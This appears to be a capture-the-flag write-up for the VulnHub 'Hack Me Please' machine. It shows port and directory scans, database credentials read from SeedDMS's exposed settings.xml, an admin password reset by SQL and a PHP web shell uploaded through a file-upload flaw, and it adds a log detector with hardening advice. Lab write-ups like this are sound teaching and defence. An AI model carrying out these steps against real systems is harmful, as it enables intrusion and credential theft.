# Hack Me Please

> <https://download.vulnhub.com/hackmeplease/Hack_Me_Please.rar>

Target IP: `192.168.32.226`

Scan the externally exposed ports and services

```
┌──(root💀kali)-[~]
└─# nmap -p 1-65535 -sV  192.168.32.226
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 04:54 EDT
Nmap scan report for 192.168.32.226
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
3306/tcp  open  mysql   MySQL 8.0.25-0ubuntu0.20.04.1
33060/tcp open  mysqlx?
```

Visit the web service on port 80

![image-20220911170000473](/files/KNycdlGs0Yq8qdlivQKS)

Brute-force directories; nothing useful turned up

```
┌──(root💀kali)-[/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.32.226/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.32.226/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/11 05:01:50 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.32.226/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.32.226/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.32.226/js/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.32.226/fonts/]
/server-status        (Status: 403) [Size: 279]

===============================================================
2022/09/11 05:02:07 Finished
===============================================================
```

A path is referenced in one of the JS files: `/seeddms51x/seeddms-5.1.22/`

![image-20220911170536079](/files/x6pkgyQKziiv1d9wqyDQ)

Visiting `/seeddms51x/seeddms-5.1.22/` shows that it is a `SeedDMS` installation

![image-20220911170613195](/files/89BOHjJlf2NuntziKSmX)

Brute-force directories again, this time under the SeedDMS path

```
┌──(root💀kali)-[/tmp]
└─# gobuster dir -w /usr/share/wordlists/rockyou.txt   -u http://192.168.32.226/seeddms51x/seeddms-5.1.22/ -edrf  -x php,html,cgi
```

Fetch the configuration file with curl and look for the database settings in it

```sh
┌──(root💀kali)-[/tmp]
└─# curl http://192.168.32.226/seeddms51x/conf/settings.xml -sL | grep -i db

       - dbDriver: DB-Driver used by adodb (see adodb-readme)
       - dbHostname: DB-Server
       - dbDatabase: database where the tables for seeddms are stored (optional - see adodb-readme)
       - dbUser: username for database-access
       - dbPass: password for database-access
    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false">
       - extraPath: Path to addtional software. This is the directory containing additional software like the adodb directory, or the pear Log package. This path will be added to the php include path
```

Log in to MySQL with the credentials recovered in the previous step

```
mysql -u seeddms -pseeddms -D seeddms --silent -h 192.168.32.226
```

There I found two tables whose names contain the string **user**: `users` and `tblUsers`. Since I could not crack the password, I updated the admin user's password.

![image-20220911171430692](/files/c2QVQLNFH44uyubRr4Gq)

With the **admin:test** credentials I successfully logged in to the application as administrator

```sql
-- SeedDMS stores passwords as unsalted MD5; md5("test") = 098f6bcd4621d373cade4e832627b4f6
UPDATE tblUsers SET pwd='098f6bcd4621d373cade4e832627b4f6' WHERE login='admin';
```

![image-20220911171901787](/files/sYaG2nl84ljNSw3JHsHo)

While searching for exploits, I found that the current version of this application is vulnerable to arbitrary file upload. This is a good start: I can upload my web shell and get a reverse Meterpreter.

> <https://www.exploit-db.com/exploits/47022>

First, we have to upload the shell by navigating to the "Add document" menu. Next, we browse to the PHP file and upload it. This gives us a blank page. However, after returning to the dashboard, we can see that a file has been uploaded.

![image-20220911172238333](/files/PLZ6dpx9yFI78dapLLKO)

![image-20220911172349781](/files/yW8csA66IiQOaHhj7vx6)

Access the reverse shell: `http://192.168.32.226/seeddms51x/data/1048576/4/1.php`

![image-20220911172639310](/files/4TLizDVKympfoqwIvnK1)
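Both weaknesses used above leave a clear trace in the web server's access log: a direct request for `conf/settings.xml`, and a request for a PHP file underneath SeedDMS' `data/` document store, a directory that should only ever serve stored documents. The following detector is an added example and not part of the original writeup; the Apache log lines are constructed to mirror the paths seen above, and the install prefix `/seeddms51x/` is only assumed for the samples, not hard-coded in the rules.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed Apache combined-format log lines (sample data, not from the target host).
SAMPLE_LOG = """\
192.168.32.100 - - [11/Sep/2022:05:02:01 -0400] "GET /seeddms51x/seeddms-5.1.22/out/out.ViewFolder.php?folderid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.32.100 - - [11/Sep/2022:05:05:12 -0400] "GET /seeddms51x/conf/settings.xml HTTP/1.1" 200 20480 "-" "curl/7.84.0"
192.168.32.100 - - [11/Sep/2022:05:26:39 -0400] "GET /seeddms51x/data/1048576/4/1.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.32.100 - - [11/Sep/2022:05:26:40 -0400] "GET /seeddms51x/data/1048576/5/2.pdf HTTP/1.1" 200 88012 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Server-side script extensions that have no business inside the document store.
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")


def classify(target: str) -> Optional[str]:
    """Label a request target as suspicious, or return None if it looks benign."""
    path = urlparse(target).path.lower()          # drop the query string before matching
    if path.endswith("/conf/settings.xml"):
        return "config-file-disclosure"           # DB credentials live in this file
    if "/data/" in path and path.endswith(SCRIPT_EXTS):
        return "script-in-document-store"         # uploaded document executed as code
    return None


def scan_access_log(log_text: str) -> list:
    """Return one finding per suspicious request; unparsable lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify(m["target"])
        if reason:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "path": urlparse(m["target"]).path, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['reason']}: {f['path']} ({f['status']})")
```

A status of 200 on either finding means the disclosure or execution actually succeeded; the matching hardening is to deny web access to `conf/` and to disable script execution under `data/` in the Apache configuration.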

View the password file

![image-20220911172705555](/files/reYbEZR5GcYjphvQ7OUB)

We have already obtained the `saket` user's password from the database.

```
MySQL [seeddms]> select * from users;
Employee_id     Employee_first_name     Employee_last_name      Employee_passwd
1       saket   saurav  Saket@#$1337
```

![image-20230208145813634](/files/LfGYGZV7tisWXLYRIiIy)

